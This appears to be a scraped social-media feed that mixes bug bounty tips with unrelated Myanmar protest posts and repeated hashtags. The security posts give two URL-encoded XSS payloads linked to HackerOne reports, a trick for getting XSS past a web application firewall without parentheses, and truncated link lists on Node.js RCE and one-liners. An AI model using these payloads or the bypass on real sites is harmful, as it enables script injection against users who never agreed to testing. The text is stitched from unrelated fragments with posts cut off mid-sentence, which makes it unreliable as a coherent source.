10 XSS payloads that you can use ! 1. ?msg=%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E, <svg/onload=alert("XSS") > hackerone.com/reports/2433634 2. ?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e hackerone.com/reports/846338 The payload

XSS without parentheses: If you’re within the JavaScript context, such as event handlers or the javascript: scheme, you can define variables to bypass WAF. Note: Define the closing parenthesis “)” before the opening parenthesis “(” Gareth Heyes \u2028 PortSwigger #bugbountytip #xss

The fastest way to become a top bug bounty hunter is to work as a triager on a bug bounty platform like HackerOne or on a security team at a big company like Amazon or Salesforce. Reading reports from other hackers can really help you get better quickly, and we've seen people who

“HackerOne employee improperly accessed vulnerability data of customers to re-submit duplicate vulnerabilities to those same customers for personal gain.” hackerone.com/reports/1622449

Close the Sky #WhatishappeninginMyanmar

#whatishappeninginmyanmar

#Whatishappeninginmyanmar

#WhatsHappeninglnMyanmar

#WhatishappeninginMyanmar

#WhatsHappeninglnMyanmar

#whatishappeninginmyanmar

#whatishappeninginmyanmar

#WhatsHappeninglnMyanmar

The small fence post where his son's head once rested... An old mother’s sorrow, her tears falling as she touches it. 😢😢 Soldiers in the Myanmar army are using drugs and killing innocent civilians. #WhatsHappeninglnMyanmar

Node.js Vulnerabilities? Here are Few blogs to learn more! 1. mchklt.medium.com/rce-via-depend… 2. medium.com/@zpbrent/how-t… 3. medium.com/@kerstan/secur… 4. medium.com/@mateusz.oleja… 5. medium.com/@tungpun/how-i… 6. medium.com/@daksh_/arbitr… 7. medium.com/@jacopotediosi… 8.

One Liners and Bug bounty ? Here are 7 blogs about One Liners to learn more about them 1. sherwyn-moodley.medium.com/possible-a-bet… 2. medium.com/@qaafqasim/pow… 3. th3m4rk5man.medium.com/one-liners-you… 4. systemweakness.com/essential-one-… 5. systemweakness.com/a-new-way-to-c… 6. infosecwriteups.com/cors-one-liner… 7.

#whatishappeninginmyanmar